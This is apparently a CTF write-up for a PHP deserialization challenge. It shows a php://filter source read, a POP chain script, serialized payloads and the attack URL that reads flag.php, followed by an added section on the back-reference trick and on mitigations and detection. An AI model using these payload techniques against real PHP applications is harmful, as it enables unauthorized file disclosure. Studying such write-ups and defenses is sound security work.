[Blue Hat Cup (蓝帽杯) 2020, 4th edition, online round] Soitgoes

Challenge
PHP deserialization with a POP chain to construct; a standard problem.
Walkthrough
1. Right-click the index.php page and view source. It looks like a PHP wrapper (php://filter) is needed to read try.php.

(index.php page source, shown as an image in the original)

2. ?file=php://filter/read=convert.base64-encode/resource= is not filtered this time, so the sources can be read directly.

index.php
(source shown as an image in the original)

try.php

<?php
// The start of this file was lost in extraction; the Seri class header and
// constructor are reconstructed from the remaining lines and the payload below.
class Seri{
    public $alize;
    function __construct($alize){
        $this->alize = $alize;
    }
    public function __destruct(){
        $this->alize->getFlag();
    }
}

class Flag{
    public $f;
    public $t1;
    public $t2;

    function __construct($file){
        $this->f = $file;
        $this->t1 = $this->t2 = md5(rand(1,10000));
    }

    public function getFlag(){
        $this->t2 = md5(rand(1,10000));
        echo $this->t1;
        echo $this->t2;
        if($this->t1 === $this->t2)
        {
            if(isset($this->f)){
                echo @highlight_file($this->f,true);
            }
        }
    }
}

3. Finding the POP chain
The magic method __destruct() in class Seri calls getFlag(), and class Flag defines getFlag().
Construct a Flag object whose argument is flag.php: $Flag=new Flag('flag.php');
Construct a Seri object whose argument is $Flag, so that when the object is destroyed, __destruct() is invoked: $test=new Seri($Flag)
getFlag() also contains an md5 check that requires t1 and t2 to be equal. Predicting the random value is unnecessary: PHP reference assignment solves it directly.

$a = 1;
$b = &$a;   // $b now aliases $a
$a = $a + 1;

In the end $b also becomes 2, because $b was assigned by reference. The same applies to the object: $Flag->t1 = &$Flag->t2; so when getFlag() reassigns t2, t1 changes with it and the comparison holds.
Final payload

<?php
// Class header reconstructed as above (lost in extraction).
class Seri{
    public $alize;
    function __construct($alize){
        $this->alize = $alize;
    }
    public function __destruct(){
        $this->alize->getFlag();
    }
}

class Flag{
    public $f;
    public $t1;
    public $t2;

    function __construct($file){
        $this->f = $file;
        $this->t1 = $this->t2 = md5(rand(1,10000));
    }

    public function getFlag(){
        $this->t2 = md5(rand(1,10000));
        echo $this->t1;
        echo $this->t2;
        if($this->t1 === $this->t2)
        {
            if(isset($this->f)){
                echo @highlight_file($this->f,true);
            }
        }
    }
}
$Flag=new Flag('flag.php');
$Flag->t1 = &$Flag->t2;
$test = new Seri($Flag);
echo urlencode(serialize($test));
?>
Running the script prints the URL-encoded payload, followed by t1 and t2 echoed by __destruct() at script end (identical, confirming the reference trick):

O%3A4%3A%22Seri%22%3A1%3A%7Bs%3A5%3A%22alize%22%3BO%3A4%3A%22Flag%22%3A3%3A%7Bs%3A1%3A%22f%22%3Bs%3A8%3A%22flag.php%22%3Bs%3A2%3A%22t1%22%3Bs%3A32%3A%224a2ddf148c5a9c42151a529e8cbdcc06%22%3Bs%3A2%3A%22t2%22%3BR%3A4%3B%7D%7D0a49e3c3a03ebde64f85c0bacd8a08e20a49e3c3a03ebde64f85c0bacd8a08e2
4. That alone is not enough. Looking at index.php, the value passed in the p parameter is what gets unserialized, so the payload goes in p.
Final payload:

url/?file=try.php&p=O%3A4%3A"Seri"%3A1%3A{s%3A5%3A"alize"%3BO%3A4%3A"Flag"%3A3%3A{s%3A1%3A"f"%3Bs%3A8%3A"flag.php"%3Bs%3A2%3A"t1"%3Bs%3A32%3A"8e98d81f8217304975ccb23337bb5761"%3Bs%3A2%3A"t2"%3BR%3A4%3B}}6e17a5fd135fcaf4b49f2860c2474c7c6e17a5fd135fcaf4b49f2860c2474c7c
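The following is an added example, not code from the writeup or the challenge. It reuses the shape of the Flag class from try.php (without the echo and highlight_file side effects) to show mechanically why a serialized back-reference (R:n) forces the t1 === t2 check to pass no matter what rand() returns, and then shows how a defender neutralises the chain: snapshotting t1 by value before t2 is reassigned, refusing to instantiate classes from untrusted input via allowed_classes, and flagging back-references in incoming serialized data. The serialized string and the hasBackReference() helper are constructed for this demo.

```php
<?php
// Added example: demonstrates the R: reference trick and its mitigations.
// Class layout assumed from the writeup's try.php; side effects removed.

class Flag {
    public $f;
    public $t1;
    public $t2;

    // Same check as the challenge: t2 is re-randomised, then compared to t1.
    public function check(): bool {
        $this->t2 = md5((string) rand(1, 10000));
        return $this->t1 === $this->t2;
    }

    // Hardened variant: copy t1 by value before touching t2. If t1 and t2 alias
    // the same value, the write to t2 also changes t1, but not the copy.
    public function checkFixed(): bool {
        $expected = $this->t1;              // string copy, not a reference
        $this->t2 = md5((string) rand(1, 10000));
        return $expected === $this->t2;
    }
}

// Constructed payload (no Seri wrapper here, so slot numbering differs from the
// writeup): value slots are 1 = Flag object, 2 = f, 3 = t1, so "R:3" turns t2
// into an alias of t1. The 32 'a's stand in for any md5 hex string.
$blob = 'O:4:"Flag":3:{s:1:"f";s:8:"flag.php";s:2:"t1";s:32:"'
      . str_repeat('a', 32) . '";s:2:"t2";R:3;}';

$obj = unserialize($blob);
var_dump($obj->check());       // always true: both properties alias one value
var_dump($obj->checkFixed());  // false: the stale copy no longer matches

// Mitigation 1: never let untrusted input instantiate application classes.
// With allowed_classes => false the result is __PHP_Incomplete_Class, which has
// no __destruct or getFlag, so the POP chain has nothing to call.
$safe = unserialize($blob, ['allowed_classes' => false]);
var_dump(get_class($safe));

// Mitigation 2 (detection heuristic): back-references (R:/r:) are rare in
// legitimate serialized data and are a strong signal of property aliasing.
function hasBackReference(string $serialized): bool {
    return (bool) preg_match('/(?:^|[;{])[Rr]:\d+;/', $serialized);
}
var_dump(hasBackReference($blob));
```

Note that the "obvious" fix of comparing t1 against a local copy of the new random value does not work: because t1 and t2 share one value slot, writing t2 also rewrites t1, so the only reliable comparison is against a value copied before the write. The real fix remains not calling unserialize() on attacker-controlled input at all.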
